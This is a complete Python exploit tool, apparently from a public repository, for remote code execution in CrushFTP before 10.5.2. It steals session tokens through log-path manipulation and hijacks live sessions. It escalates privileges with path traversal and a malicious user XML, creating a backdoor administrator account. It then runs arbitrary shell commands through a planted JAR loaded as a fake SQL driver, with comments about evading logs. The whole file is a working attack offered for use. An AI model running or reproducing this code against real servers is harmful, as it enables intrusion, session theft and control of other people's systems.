README.md
Rendering markdown...
#!/usr/bin/env python3
banner = """
>>>>>>>>>>>>>>>>>>>>\-/<<<<<<<<<<<<<<<<<<<<<<<
>>>>>>>>>>>>> CrushFTP RCE <<<<<<<<<<<<<<<<<
>>>>>>>>>>>>>>> <10.5.2 <<<<<<<<<<<<<<<<<<
>>>>>>>> Ryan Emmons, Evan Malamis <<<<<<<<<
>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<
"""
import binascii, chime, click, hashlib, json, os, questionary, re
import requests, signal, subprocess, sys, urllib3, yaspin, zipfile
from six.moves.urllib.parse import quote as url_encode
from base64 import b64decode, b64encode
from time import sleep
from tqdm import tqdm
def handle(signum, frame):
print("\n[*] Killed")
quit()
def log(to_log, item=None, score=None):
if item:
item = " - %s" % str(item)
else:
item = ""
if score == True:
print("[+] %s%s" % (to_log, item))
else:
print("[*] %s%s" % (to_log, str(item)))
def prompt(question, options):
prompt_style = questionary.Style([
('question', 'bold'),
('pointer', 'bold'),
('highlighted', 'bold')
])
resp = questionary.select(question, options, qmark="[*]").ask()
return resp
chime.theme('zelda')# :)
urllib3.disable_warnings()
signal.signal(signal.SIGINT, handle)
rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
rand_dir = "/WebInterface/Resources/libs/jq-3.6.0_"+rand+"-js/"
@click.group()
def cli():
pass
@cli.command()
@click.option('-t', '--target', required=True, help='Target IP address')
@click.option('-p', '--port', required=True, type=int, help='CrushFTP web interface port number')
def auth_bypass(target, port):
print(banner)
function_url = "https://%s:%s/WebInterface/function/" % (target, port)
log("Getting session token for user 'anonymous'...")
try:
anon_cookie = get_anon_session(target, port)
except:
print("[-] The target site can't be reached, manually verify it's correct")
quit()
log("Got token", anon_cookie, True)
log("Attempting to steal session potfile...")
(session_file, session_file_hash) = steal_file(target, port, "sessions.obj", anon_cookie, "stealSessions", "")
if len(session_file) == 0:
pass
else:
log("Stole session potfile!", "", True)
log("Spraying CrushFTP API to identify live sessions...")
sploit = False
prompted = False
cached_hash = ""
while not sploit:
while True:
if cached_hash != session_file_hash:
valid_list = check_sessions(target, port, session_file)
if len(valid_list) != 0:
cached_hash = session_file_hash
break
if prompted == True:
log("No live sessions found in potfile")
if prompted == False:
log("Exploit works! However, no live sessions were found in the application (common for less active FTP servers)")
log("Polling mode checks for new logins to auto-exploit every 30 seconds")
prompt_response = prompt("Would you like to enter polling mode?",
["Yes, enter polling mode and notify me with a sound effect when a token is found",
"No, I'd rather not exploit the target"])
if prompt_response == "No, I'd rather not exploit the target":
log("Quitting...")
quit()
log("New sessions will write to disk every 10 minutes or so by default")
prompted = True
cached_hash = session_file_hash
with yaspin.yaspin(text="Listening for new sessions...") as sp:
sleep(30)
(session_file, session_file_hash) = steal_file(target, port, "sessions.obj", anon_cookie, "stealSessions", "")
log("Valid sessions found in pot!", "", True)
chime.success()
privesc_users = {}
user_eggs = {}
uploaded_admin_xml = False
for username in valid_list:
log("User: %s - Cookie: CrushAuth=%s; currentAuth=%s" % (username, valid_list[username], valid_list[username][-4:]), "", True)
for username in valid_list:
log("Getting permissions and file access for user", username)
# If an admin is hijacked (else clause), the whole privilege escalation phase can be skipped in favor of directly running the RCE module
write_permission_locations_combined = []
try:
recursive_directory_structure = combined_recursive_build_directory_structure(target, port, valid_list[username], '/', write_permission_locations_combined)
except:
recursive_directory_structure = {}
if len(write_permission_locations_combined) > 0:
log("The user has access to the following directories and files:")
tree_out = render_tree({'contents': recursive_directory_structure['contents']})
tree_out.insert(0, ".")
print(("\n".join(tree_out))+"\n")
log("Identified a directory that the hijacked user can write to", write_permission_locations_combined[0], True)
egg_rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
egg_filename = url_encode(write_permission_locations_combined[0] + egg_rand)
log("Uploading egg for informational leak...")
upload_eggfile(target, port, valid_list[username], egg_filename, function_url, egg_rand)
log("Uploaded egg to VFS", egg_filename, True)
user_filename = url_encode(write_permission_locations_combined[0] + "user.XML")
log("Uploading user.XML file to writable VFS for privilege escalation...")
upload_userfile(target, port, valid_list[username], user_filename, function_url)
log("Uploaded malicious admin XML to VFS", user_filename, True)
uploaded_admin_xml = True
break
else:
# check if already admin but no allocated writable directories
(is_admin, host_operatingsystem) = check_if_admin(target, port, valid_list[username])
if is_admin:
log("User has administrator permissions", username, True) # If an admin is found, create a new admin account
log("Host OS found", host_operatingsystem, True)
log("Creating new administrator account...")
success = create_admin_account_rce(function_url, valid_list[username], host_operatingsystem)
log("Backdoor administrator account created", "%s:%s" % (rand, rand), True)
log("Exploit complete! Run RCE module with administrator credentials for code execution")
quit()
# Not admin, no writable
log("The user has no administrator or upload permissions, automatic privilege escalation is not possible")
if recursive_directory_structure:
tree_out = render_tree({'contents': recursive_directory_structure['contents']})
tree_out.insert(0, ".")
if len(tree_out) > 1:
log("User '%s' has access to the following directories and files:" % (username))
print(("\n".join(tree_out))+"\n")
else:
log("User '%s' does not have access to any files or directories" % (username))
else:
log("User '%s' does not have access to any files or directories" % (username))
if uploaded_admin_xml:
(paths_extracted, session_file_hash) = steal_file(target, port, "sessions.obj", anon_cookie, "huntEgg", write_permission_locations_combined[0] + egg_rand)
log("Waiting for egg to propagate into serialized object for full path leak (this process typically takes 8-12 minutes)...")
# This privesc won't work in SQL mode, but abusing the arbitrary read/write would be easy to implement for privesc via query file overwrites, so all SQL instances are vulnerable.
while True:
if cached_hash != session_file_hash:
if len(paths_extracted) != 0:
path = paths_extracted[0].decode("utf-8")
log("Egg found! Full filesystem path leaked", path, True)
break
log("Fresh serialized object found, but egg has not yet propagated")
cached_hash = session_file_hash
with yaspin.yaspin(text="Waiting...") as sp:
sleep(30)
(paths_extracted, session_file_hash) = steal_file(target, port, "sessions.obj", anon_cookie, "huntEgg", write_permission_locations_combined[0] + egg_rand)
windows_path_pattern = r'^FILE://[A-Z]:/'
if bool(re.match(windows_path_pattern, path)):
log("Target is a Windows host")
written_dir = re.split(r"://[A-Z]:", path)[1][:-10]
else:
log("Target is a Linux or Mac host")
written_dir = path.split("FILE:/")[1][:-10]
log("Getting new anonymous session token...")
anon_cookie2 = get_anon_session(target, port)
log("Got token", anon_cookie, True)
log("Creating attacker-controlled administrator account...")
create_admin_via_log_abuse(target, port, anon_cookie2, rand, written_dir)
log("Backdoor administrator account created", "%s:%s" % (rand, rand), True)
log("Exploit complete! Run RCE module with administrator credentials for code execution")
quit()
# Polish: handle 'else' here for if the xml was not uploaded properly
def build_directory_structure_for_item(item):
return {
'permissions': item.get("privs", "(inherited)"),
'contents': {} # This is empty because individual items don't have further nested contents.
}
def combined_recursive_build_directory_structure(server, port, cookie, directory_path, write_permission_locations):
data = query_directory(server, port, cookie, directory_path)
if not data or data == "{}":
return {}
parsed_data = json.loads(data)
# Check for write privileges
if "(write)" in parsed_data['privs']:
write_permission_locations.append(parsed_data['path'])
structure = {
'permissions': parsed_data['privs'],
'contents': {}
}
for item in parsed_data.get("listing", []):
path = item.get("path", item.get("href_path", None))
# Append '/' for directory paths
if item["type"] == "DIR" and not path.endswith('/'):
path += '/'
contents = combined_recursive_build_directory_structure(server, port, cookie, path, write_permission_locations) if item["type"] == "DIR" else build_directory_structure_for_item(item)
structure['contents'][path] = contents
return structure
@cli.command()
@click.option('-t', '--target', required=True, help='Target IP address')
@click.option('-p', '--port', required=True, type=int, help='CrushFTP web interface port number')
@click.option('-U', '--username', required=True, help='Admin username for rce function')
@click.option('-P', '--password', required=True, help='Admin password for rce function')
@click.option('-s', '--system-os', required=True, help='Operating system of the target host ("windows"/"unix-like")')
@click.option('-c', '--command', required=True, help='Command for rce function')
def rce(target, port, username, password, system_os, command):
if not ((system_os == "unix-like") or (system_os == "windows")):
print("[-] System OS input is not valid")
quit()
function_url = "https://%s:%s/WebInterface/function/" % (target, port)
(token) = get_session(function_url, username, password)
(jar_size, jar_name) = generate_rce_jar(system_os, command)
success = create_admin_account_rce(function_url, token, system_os)
if not success:
log("User is not an administrator")
quit()
new_admin_token = get_session(function_url, rand, rand)
upload_jar_and_trigger_rce(target, port, function_url, jar_name, jar_size, new_admin_token, system_os)
clean_up(function_url, token, jar_name) # This needs to be polished to avoid leaving debris laying around. Can also clean logs to evade
def generate_rce_jar(host_type, command):
jarname = "Z%s.jar" % (rand)
javaname = "Z%s.java" % (rand)
classname = "Z%s.class" % (rand)
manifest_info = "Manifest-Version: 1.0\nCreated-By: 11.0.19 (Eclipse Adoptium)\n"
if host_type == "unix-like": cmdline = "Process process = Runtime.getRuntime().exec(new String[]{\"/bin/bash\", \"-c\", \"" + command + "\"});"
elif host_type == "windows": cmdline = "Process process = Runtime.getRuntime().exec(new String[]{\"cmd.exe\", \"/c\", \"" + command + "\"});"
java_class = ("import java.io.*;\n"
"public class Z" + rand + " {\n"
" static {\n"
" try {\n"+cmdline+"\n"
" BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));\n"
" String line;\n"
" while ((line = reader.readLine()) != null) {\n"
" System.out.println(line);\n"
" }\n"
" reader.close();\n"
" } catch (IOException e) {\n"
" e.printStackTrace();\n"
" }\n"
" }\n"
"}")
with open(javaname, "wb") as f:
f.write(bytearray(java_class, encoding="utf-8"))
with open("MANIFEST.MF", "w") as f:
f.write(manifest_info)
try:
subprocess.check_call(["javac", javaname])
log("Java class compiled", classname, True)
except subprocess.CalledProcessError:
log("Error occurred while trying to compile Java class", "be sure to install Java first!")
os.remove("MANIFEST.MF")
os.remove(javaname)
exit()
try:
subprocess.check_call(["jar", "cf", jarname, classname])
log("Java JAR built", jarname, True)
except subprocess.CalledProcessError:
log("Error occurred while trying to create Java jar file", "be sure to install Java first!")
os.remove("MANIFEST.MF")
os.remove(javaname)
os.remove(classname)
exit()
log("Removing build debris...")
os.remove("MANIFEST.MF")
os.remove(javaname)
os.remove(classname)
return (os.path.getsize(jarname), jarname)
def render_tree(data, prefix=''):
output = []
keys = sorted(data['contents'].keys())
for i, key in enumerate(keys):
display_key = key.split('/')[-2] if key.endswith('/') else key.split('/')[-1]
if i == len(keys) - 1:
output.append(f"{prefix}└── {display_key}")
new_prefix = prefix + " "
else:
output.append(f"{prefix}├── {display_key}")
new_prefix = prefix + "│ "
if data['contents'][key]['contents']:
output.extend(render_tree(data['contents'][key], new_prefix))
return output
def get_anon_session(server, port):
r = requests.get("https://%s:%s/WebInterface/" % (server,port), verify=False)
cookies = r.cookies.get_dict()
return cookies["CrushAuth"]
def query_directory(server, port, cookie, path):
new_rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
headers = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (cookie, cookie[-4:]),
"as2-to": new_rand,
"dont_log": "true",
"user_ip": "127.0.0.1"
}
r = requests.post("https://%s:%s/WebInterface/function/?command=getXMLListing&format=JSONOBJ&path=%s&random=0.2884559514588281&c2f=%s" % (server, port, url_encode(path), cookie[-4:]), verify=False, headers=headers)
return (r.text)
def get_session(function_url, username, password):
log("Fetching session tokens", "%s:%s" % (username, password))
headers = {
"as2-to": rand,
"user_ip": "127.0.0.1",
"dont_log": "true"
}
data = {
"command": "login",
"username": url_encode(username),
"password": url_encode(password),
"encoded": "true",
"language": "en",
"random": "0.34712915617878926"
}
r = requests.post(function_url, verify=False, timeout=10, data=data, allow_redirects=False) #, proxies=proxies, headers=headers)
cookies = r.cookies.get_dict()
log("Got user session token", "%s" % (cookies["CrushAuth"]), True)
return (cookies["CrushAuth"])
def create_admin_account_rce(function_url, token, system_os):
log("Attempting to create backdoor administrator account")
headers = {"Cookie": "CrushAuth=%s" % (token)}
if system_os == "unix-like":
data = {
"command": "setUserItem",
"data_action": "new",
"serverGroup": "MainUsers",
"username": rand,
"user": "<?xml version='1.0' encoding='UTF-8'?><user type='properties'><username>%s</username><password>%s</password><extra_vfs type='vector'></extra_vfs><version>1.0</version><userVersion>6</userVersion><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>06232023192323</created_time><filePublicEncryptionKey></filePublicEncryptionKey><fileDecryptionKey></fileDecryptionKey><max_logins>0</max_logins><root_dir>/</root_dir><site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>1687550778682</created_time><password_history></password_history></user>" % (rand, rand),
"xmlItem": "user",
"vfs_items": "<?xml version='1.0' encoding='UTF-8'?><vfs_items type='vector'><vfs_items_subitem type='properties'><name>tmp</name><path>/</path><vfs_item type='vector'><vfs_item_subitem type='properties'><type>DIR</type><url>FILE://var/tmp/</url></vfs_item_subitem></vfs_item></vfs_items_subitem></vfs_items>",
"permissions": "<?xml version='1.0' encoding='UTF-8'?><VFS type='properties'><item name='/'>(read)(view)(resume)</item><item name='/TMP/'>(read)(write)(view)(delete)(deletedir)(makedir)(rename)(resume)(share)(slideshow)</item></VFS>",
"c2f": token[-4:]
}
else:
data = {
"command": "setUserItem",
"data_action": "new",
"serverGroup": "MainUsers",
"username": rand,
"user": "<?xml version='1.0' encoding='UTF-8'?><user type='properties'><username>%s</username><password>%s</password><extra_vfs type='vector'></extra_vfs><version>1.0</version><userVersion>6</userVersion><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>06232023192323</created_time><filePublicEncryptionKey></filePublicEncryptionKey><fileDecryptionKey></fileDecryptionKey><max_logins>0</max_logins><root_dir>/</root_dir><site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>1687550778682</created_time><password_history></password_history></user>" % (rand, rand),
"xmlItem": "user",
"vfs_items": "<?xml version='1.0' encoding='UTF-8'?><vfs_items type='vector'><vfs_items_subitem type='properties'><name>tmp</name><path>/</path><vfs_item type='vector'><vfs_item_subitem type='properties'><type>DIR</type><url>FILE://C:/Users/Public/</url></vfs_item_subitem></vfs_item></vfs_items_subitem></vfs_items>",
"permissions": "<?xml version='1.0' encoding='UTF-8'?><VFS type='properties'><item name='/'>(read)(view)(resume)</item><item name='/TMP/'>(read)(write)(view)(delete)(deletedir)(makedir)(rename)(resume)(share)(slideshow)</item></VFS>",
"c2f": token[-4:]
}
r = requests.post(function_url, verify=False, timeout=10, data=data, allow_redirects=False, headers=headers)
if (not "Access Denied" in r.text) and (not r.status_code == 404):
return True
else:
return False
def upload_eggfile(server, port, cookie, filepath, function_url, egg_rand):
headers = {
"Cookie": "CrushAuth=%s" % (cookie)
}
data1 = {
"command": (None, "openFile"),
"upload_path": (None, filepath),
"upload_size": (None, 3),
"upload_id": (None, egg_rand),
"start_resume_loc": (None, "0"),
"c2f": (None, cookie[-4:])
}
data2 = {
"CFCD": (filepath, b"h4x", "application/octet-stream")
}
data3 = {
"command": (None, "closeFile"),
"upload_id": (None, egg_rand),
"total_chunks": (None, "1"),
"total_bytes": (None, 3),
"filePath": (None, filepath),
"lastModified": (None, "1687552877283"),
"start_resume_loc": (None, "0"),
"c2f": (None, cookie[-4:])
}
r1 = requests.post(function_url, verify=False, files=data1, headers=headers)
r2 = requests.post("https://%s:%s/U/%s~1~%s" % (server, port, egg_rand, 3), verify=False, files=data2, headers=headers)
r3 = requests.post(function_url, verify=False, files=data3, headers=headers)
def upload_userfile(server, port, cookie, filepath, function_url):
hashed_password = "MD5:" + hashlib.md5(rand.encode()).hexdigest()
eviladmin_xml = ("<?xml version='1.0' encoding='UTF-8'?><user type='properties'><username>%s</username><password>%s</password><extra_vfs type='vector'></extra_vfs><version>1.0</version><userVersion>6</userVersion><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>06232023192323</created_time><filePublicEncryptionKey></filePublicEncryptionKey><fileDecryptionKey></fileDecryptionKey><max_logins>0</max_logins><root_dir>/</root_dir><site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site><created_by_username>crushadmin</created_by_username><created_by_email></created_by_email><created_time>1687550778682</created_time><password_history></password_history></user>" % (rand, hashed_password)).encode()
headers = {
"Cookie": "CrushAuth=%s" % (cookie)
}
data1 = {
"command": (None, "openFile"),
"upload_path": (None, filepath),
"upload_size": (None, 747),
"upload_id": (None, rand),
"start_resume_loc": (None, "0"),
"c2f": (None, cookie[-4:])
}
data2 = {
"CFCD": (filepath, eviladmin_xml, "application/octet-stream")
}
data3 = {
"command": (None, "closeFile"),
"upload_id": (None, rand),
"total_chunks": (None, "1"),
"total_bytes": (None, 747),
"filePath": (None, filepath),
"lastModified": (None, "1687552877283"),
"start_resume_loc": (None, "0"),
"c2f": (None, cookie[-4:])
}
r1 = requests.post(function_url, verify=False, files=data1, headers=headers)
r2 = requests.post("https://%s:%s/U/%s~1~%s" % (server, port, rand, 747), verify=False, files=data2, headers=headers)
r3 = requests.post(function_url, verify=False, files=data3, headers=headers)
def upload_jar_and_trigger_rce(server, port, function_url, jarname, jarsize, new_admin_token, system_os):
jarfile = open(jarname, "rb")
headers = {
"Cookie": "CrushAuth=%s" % (new_admin_token)
}
data1 = {
"command": (None, "openFile"),
"upload_path": (None, jarname),
"upload_size": (None, jarsize),
"upload_id": (None, rand),
"start_resume_loc": (None, "0"),
"c2f": (None, new_admin_token[-4:])
}
data2 = {
"CFCD": (jarname, jarfile.read(), "application/octet-stream")
}
data3 = {
"command": (None, "closeFile"),
"upload_id": (None, rand),
"total_chunks": (None, "1"),
"total_bytes": (None, jarsize),
"filePath": (None, jarname),
"lastModified": (None, "1687552877283"),
"start_resume_loc": (None, "0"),
"c2f": (None, new_admin_token[-4:])
}
if system_os == "unix-like":
data4 = {
"command": "testDB",
"db_driver_file": "%%2Fvar%%2Ftmp%%2F%s" % (jarname),
"db_driver": "Z%s" % (rand),
"db_url": "jdbc:derby:./hax;create=true",
"db_user": "hax",
"db_pass": "anotherhax",
"c2f": new_admin_token[-4:]
}
else:
data4 = {
"command": "testDB",
"db_driver_file": "%%2FC:%%2FUsers%%2FPublic%%2F%s" % (jarname),
"db_driver": "Z%s" % (rand),
"db_url": "jdbc:derby:./hax;create=true",
"db_user": "hax",
"db_pass": "anotherhax",
"c2f": new_admin_token[-4:]
}
log("Uploading malicious JAR file to temporary VFS")
r1 = requests.post(function_url, verify=False, files=data1, headers=headers)
r2 = requests.post("https://%s:%s/U/%s~1~%s" % (server, port, rand, jarsize), verify=False, files=data2, headers=headers)
r3 = requests.post(function_url, verify=False, files=data3, headers=headers)
if system_os == "unix-like": log("Malicious JAR file uploaded", "/var/tmp/%s" % (jarname), True)
else: log("Malicious JAR file uploaded", "C:/Users/Public/%s" % (jarname), True)
log("Triggering SQL driver hijack via search path configuration")
r4 = requests.post(function_url, verify=False, data=data4, headers=headers)
if "ClassCastException" in r4.text:
log("Java classloader hijacked via fake SQL driver, command executed", "", True)
else:
log("SQL driver hijack failed! Manually confirm the target is vulnerable.")
quit()
def clean_up(function_url, token, jarname):
# TODO: need to clean up the artifacts in /var/tmp and polish this for Windows
log("Cleaning up JAR")
os.remove(jarname)
headers1 = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (token, token[-4:])
}
data1 = {
"command": (None, "delete"),
"names": (None, "%%2F%s" % (jarname)),
"random": (None, "0.9531313824118071"),
"c2f": (None, token[-4:])
}
headers2 = {"Cookie": "CrushAuth=%s" % (token)}
data2 = {
"command": "setUserItem",
"data_action": "delete",
"usernames": rand,
"user": "<?xml version='1.0' encoding='UTF-8'?>",
"xmlItem": "user",
"vfs_items": "<?xml version='1.0' encoding='UTF-8'?><vfs type='vector'></vfs>",
"permissions": "<?xml version='1.0' encoding='UTF-8'?><permissions type='vector'></permissions>",
"c2f": token[-4:]
}
log("Wiping temporary VFS and deleting temporary account")
r1 = requests.post(function_url, verify=False, files=data1, headers=headers1)
r2 = requests.post(function_url, verify=False, data=data2, headers=headers2)
log("Clean-up complete", "exploit successful!", True)
def create_admin_via_log_abuse(server, port, anon_cookie, admin_username, writable_dir):
new_rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
headers1 = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (anon_cookie, anon_cookie[-4:]),
"as2-to": new_rand,
"user_ip": "127.0.0.1",
"dont_log": "true",
"user_name": new_rand,
"user_protocol_proxy": new_rand,
"user_log_file": "user.XML",
"user_log_path": "./../../../../../../../../../../../../../../.." + writable_dir,
"user_log_path_custom": "./users/MainUsers/%s/" % (admin_username),
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36"
}
data = {"post": "body"}
headers2 = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (anon_cookie, anon_cookie[-4:]),
"as2-to": new_rand,
"user_ip": "127.0.0.1",
"dont_log": "true"
}
r1 = requests.post("https://%s:%s/WebInterface/function/?command=getUsername&c2f=%s" % (server, port, anon_cookie[-4:]), verify=False, headers=headers1, data=data)
if (not "success" in r1.text) or (not new_rand in r1.text):
log("Failure spoofing user! This exploit may not be applicable to the target or exploit may have run recently.")
quit()
def steal_file(server, port, filename, anon_token, mode, egg):
new_rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
headers1 = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (anon_token, anon_token[-4:]),
"as2-to": new_rand,
"user_ip": "127.0.0.1",
"filename": "/",
"dont_log": "true",
"user_name": new_rand,
"user_protocol_proxy": new_rand,
"user_log_file": filename,
"user_log_path": "./",
"user_log_path_custom": "."+rand_dir,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36"
}
data = {"post": "body"}
headers2 = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (anon_token, anon_token[-4:]),
"as2-to": new_rand,
"user_ip": "127.0.0.1",
"dont_log": "true"
}
r1 = requests.post("https://%s:%s/WebInterface/function/?command=getUsername&c2f=%s" % (server, port, anon_token[-4:]), verify=False, headers=headers1, data=data)
if (not "success" in r1.text) or (not new_rand in r1.text):
log("Failure spoofing user! This exploit may not be applicable to the target or exploit may have run recently.")
quit()
r2 = requests.get("https://%s:%s%s%s" % (server,port,rand_dir,filename), verify=False, headers=headers2)
if mode == "stealSessions":
pattern = r'\d{13}_[A-Za-z0-9]{30}'
else:
pattern = fr"FILE://.*{re.escape(egg)}"
pattern_bytes = pattern.encode()
matches_bytes = list(set(re.findall(pattern_bytes, r2.content)))
matches_bytes_len = len(matches_bytes)
if r2.status_code == 404:
log("Failure stealing potfile! Exploit is likely not applicable to the target.")
quit()
elif (matches_bytes_len == 0) and (b"java." not in r2.content):
# No session tokens, potfile didn't copy, log location is under attacker control
pass
elif (matches_bytes_len == 0) and (b"java." in r2.content):
# No session tokens, potfile did copy, log location is under attacker control
pass
# Return the list of session tokens and a hash of the downloaded file to avoid unnecessary spraying
return (matches_bytes, b64encode(hashlib.sha256(r2.content).digest()))
def check_sessions(server, port, sessions):
new_rand = binascii.hexlify(os.urandom(5)).decode("utf-8")
valid_sessions = {}
if len(sessions) == 0:
return valid_sessions
pattern = r"<username>(.*?)</username>"
log("Spraying %s tokens against CrushFTP API to identify live sessions" % (len(sessions)))
for i in tqdm(sessions):
cookie = i.decode("utf-8")
headers = {
"Cookie": "CrushAuth=%s; currentAuth=%s" % (cookie, cookie[-4:]),
"as2-to": new_rand,
"dont_log": "true",
"user_ip": "127.0.0.1"
}
r1 = requests.post("https://%s:%s/WebInterface/function/?command=getUsername&c2f=%s" % (server, port, cookie[-4:]), verify=False, headers=headers)
if not "<response>failure</response>" in r1.text:
username = re.search(pattern, r1.text).group(1)
valid_sessions[username] = cookie
try:
del valid_sessions["anonymous"]
except:
pass
return valid_sessions
def check_if_admin(server, port, cookie):
headers = {
"Cookie": "CrushAuth=%s" % (cookie)
}
data1 = {
"command": (None, "getDashboardItems"),
"c2f": (None, cookie[-4:])
}
r1 = requests.post("https://%s:%s/WebInterface/function/?command=getDashboardItems&c2f=%s" % (server, port, cookie[-4:]), verify=False, headers=headers)
if "about_info_str" in r1.text:
if "<machine_is_windows>true" in r1.text: host_os = "windows"
else: host_os = "unix-like"
return (True, host_os) # user is admin. return true, OS
else:
return (False, False) # user is not admin. return false, false
if __name__ == "__main__":
cli()